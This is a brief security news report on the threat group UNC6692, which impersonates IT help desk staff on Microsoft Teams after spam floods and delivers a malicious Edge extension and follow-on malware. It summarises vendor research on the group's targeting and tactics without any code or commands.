A previously unidentified threat group, referred to as UNC6692, has been reported to exploit Microsoft Teams for deploying a custom malware suite on compromised systems. This activity involves social engineering tactics, particularly impersonating IT help desk personnel to manipulate victims into accepting chat invitations from external accounts.
Attack Methodology
According to a report by Mandiant, UNC6692 has orchestrated a large email campaign designed to inundate targets with spam, creating a sense of urgency. Following this, the group initiates contact through Microsoft Teams, posing as IT support to offer assistance with the email issues. This tactic mirrors previous methods used by affiliates of the now-defunct Black Basta group, which also relied on similar impersonation strategies.
Target Demographics
Data from ReliaQuest indicates that from March 1 to April 1, 2026, 77% of the incidents attributed to UNC6692 targeted senior-level employees, a significant increase from 59% in the preceding months. This shift highlights a focused approach on high-ranking individuals within organizations, aiming for initial access to corporate networks for potential data theft and other malicious activities.
Malware Deployment and Functionality
The attack chain diverges from traditional methods, as victims are directed to click on a phishing link shared via Teams chat, purportedly to install a patch for the spam issue. This link leads to the download of an AutoHotkey script from an AWS S3 bucket. The script is engineered to conduct reconnaissance and install SNOWBELT, a malicious browser extension for Microsoft Edge, enabling further payload delivery.
Once installed, SNOWBELT facilitates the download of additional malicious components, including SNOWGLAZE and SNOWBASIN, which serve various roles such as establishing secure communication channels and enabling remote command execution.
Exfiltration and Persistence Techniques
UNC6692 employs a range of post-exploitation tactics, including lateral movement within the network and credential harvesting. The malware ecosystem allows for actions such as scanning local networks, establishing remote sessions, and exfiltrating sensitive data using tools like Rclone. This reliance on legitimate cloud services for command-and-control operations enables the group to evade detection by blending into normal enterprise traffic.
Microsoft has acknowledged the growing trend of using collaboration tools like Microsoft Teams for such malicious activities, emphasizing the need for organizations to implement stringent verification processes and enhance security measures around remote support tools.
This article was produced by NeonPulse.today using human and AI-assisted editorial processes, based on publicly available information. Content may be edited for clarity and style.
